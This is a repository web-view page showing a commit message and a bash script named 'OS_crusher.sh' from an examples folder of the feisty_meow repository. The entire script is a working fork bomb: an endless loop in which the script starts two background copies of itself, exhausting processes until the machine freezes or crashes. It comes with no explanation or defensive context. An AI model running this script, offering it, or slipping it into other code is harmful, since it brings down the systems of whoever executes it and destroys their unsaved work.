added more info about how repo was constructed. probably via remote add.
[feisty_meow.git] / examples / os_related / OS_crusher.sh
1 #!/bin/bash
2
3 while true; do
4   $0 &
5   $0 &
6 done
7